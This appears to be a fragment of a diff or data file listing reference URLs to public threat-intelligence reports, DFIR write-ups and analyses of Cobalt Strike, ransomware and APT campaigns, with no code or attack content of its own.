"https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", - "https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes", - "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", - "https://www.youtube.com/watch?v=gfYswA_Ronw", - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns", - "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ", - "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", - "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", - "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/", - "https://www.secureworks.com/research/threat-profiles/gold-dupont", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf", - "https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/", - "https://www.youtube.com/watch?v=GfbxHy6xnbA", - "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html", - "https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", - "http://www.secureworks.com/research/threat-profiles/gold-winter", - "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan", - "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/", - "https://www.telsy.com/download/5972/?uid=d7c082ba55", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", - "https://www.youtube.com/watch?v=ysN-MqyIN7M", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", - "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", - "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://blog.zsec.uk/cobalt-strike-profiles/", - "https://blog.macnica.net/blog/2020/11/dtrack.html", - "https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine", - "https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b", - "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper", - "https://www.cobaltstrike.com/support", - "https://www.youtube.com/watch?v=pIXl79IPkLI", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718", - "https://blogs.blackberry.com/en/2021/11/zebra2104", - "https://thedfirreport.com/2022/03/07/2021-year-in-review/", - "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", - "https://www.secureworks.com/research/darktortilla-malware-analysis", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://blog.group-ib.com/REvil_RaaS", - "https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/", - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", - "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", - "https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting", - "https://mez0.cc/posts/cobaltstrike-powershell-exec/", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack", - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", - "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", - "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", - "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/", - "https://www.contextis.com/en/blog/dll-search-order-hijacking", - "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/", - "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", - "https://blogs.blackberry.com/en/2022/01/log4u-shell4me", - "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", - "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike", - "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", - "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e", - "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", - "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", - "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/", - "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5", - "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", - "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", - "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", - "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes", - "https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://intel471.com/blog/shipping-companies-ransomware-credentials", - "https://twitter.com/vikas891/status/1385306823662587905", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://github.com/sophos-cybersecurity/solarwinds-threathunt", - "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/", - "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py", - "https://www.youtube.com/watch?v=XfUTpwZKCDU", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://isc.sans.edu/diary/rss/27618", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf", - "https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/", - "https://www.youtube.com/watch?v=LA-XE5Jy2kU", - "https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf", - "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", - "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/", - "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664", - "https://netresec.com/?b=214d7ff", - "https://www.inde.nz/blog/different-kind-of-zoombomb", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://asec.ahnlab.com/ko/19860/", - "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/", - "https://www.cynet.com/understanding-squirrelwaffle/", - "https://paper.seebug.org/1301/", - "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", - "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns", - "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.istrosec.com/blog/apt-sk-cobalt/", - "https://isc.sans.edu/diary/rss/28934", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", - "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", - "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", - "https://www.accenture.com/us-en/blogs/security/ransomware-hades", - "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", - "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e", - "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", - "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion", - "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", - "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", - "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", - "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", - "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear", - "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", - "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", - "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", - "https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", - "https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/", - "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", - "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", - "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", - "https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/", - "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", - "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", - "https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42", - "https://thedfirreport.com/2022/04/25/quantum-ransomware/", - "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/", - "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/", - "https://www.ic3.gov/Media/News/2021/210823.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-waterfall", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://www.ironnet.com/blog/ransomware-graphic-blog", - "https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", - "https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/", - "https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/", - "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", - "https://wbglil.gitbook.io/cobalt-strike/", - "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/", - "https://skyblue.team/posts/scanning-virustotal-firehose/", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia", - "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf", - "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/", - "https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/", + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", - "https://twitter.com/elisalem9/status/1398566939656601606", - "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", - "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", - "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", - "https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html", - "https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html", - "https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64", - "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/", - "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", - "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", - "https://www.varonis.com/blog/hive-ransomware-analysis", - "https://securelist.com/apt-luminousmoth/103332/", - "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", - "https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a", - "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950", - "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", - "https://www.youtube.com/watch?v=y65hmcLIWDY", - "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", - "https://cyber.wtf/2022/03/23/what-the-packer/", - "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", - "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "https://www.youtube.com/watch?v=WW0_TgWT2gs", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://zero.bs/cobaltstrike-beacons-analyzed.html", - "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", - "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", - "https://connormcgarr.github.io/thread-hijacking/", - "https://isc.sans.edu/diary/rss/28448", - "https://www.youtube.com/watch?v=FC9ARZIZglI", - "https://web.br.de/interaktiv/ocean-lotus/en/", - "https://community.riskiq.com/article/0bcefe76", - "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", - "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/", - "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/", - "https://twitter.com/AltShiftPrtScn/status/1385103712918642688", - "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", - "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/", "https://www.youtube.com/watch?v=6SDdUVejR2w", - "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one", - "https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/", - "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", - "https://twitter.com/ffforward/status/1324281530026524672", - "https://redcanary.com/blog/intelligence-insights-december-2021", - "https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/", - "https://www.malware-traffic-analysis.net/2021/09/17/index.html", - "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/", - "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", - "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", - "https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", - "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", - "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", - "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", - "https://twitter.com/MBThreatIntel/status/1412518446013812737", - "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", - "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", - "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love", - "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", - "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734", - "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/", - "https://twitter.com/GossiTheDog/status/1438500100238577670", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://asec.ahnlab.com/en/31811/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html", - "https://cert.gov.ua/article/37704", - "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", - "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/", - "https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/", - "https://twitter.com/RedDrip7/status/1402640362972147717?s=20", - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", - "https://twitter.com/swisscom_csirt/status/1354052879158571008", - "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/", - "https://isc.sans.edu/diary/28636", - "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/", - "https://redcanary.com/blog/getsystem-offsec/", - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", - "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", - "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", - "https://isc.sans.edu/diary/rss/26862", - "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "https://isc.sans.edu/diary/26752", - "https://redcanary.com/blog/grief-ransomware/", - "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", - "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", - "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/", - "https://malwarelab.eu/posts/fin6-cobalt-strike/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang", - "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", - "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://asec.ahnlab.com/ko/19640/", - "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f", - "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#", - "https://twitter.com/MsftSecIntel/status/1522690116979855360", - "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups", - "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/", - "https://twitter.com/cglyer/status/1480742363991580674", - "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", - "https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/", - "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", - "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", - "https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book", - "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", - "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", - "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", - "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://twitter.com/alex_lanstein/status/1399829754887524354", - "https://blog.group-ib.com/colunmtk_apt41", - "https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/", - "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", - "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/", - "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", - "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures", - "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", - "https://asec.ahnlab.com/en/34549/", - "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - 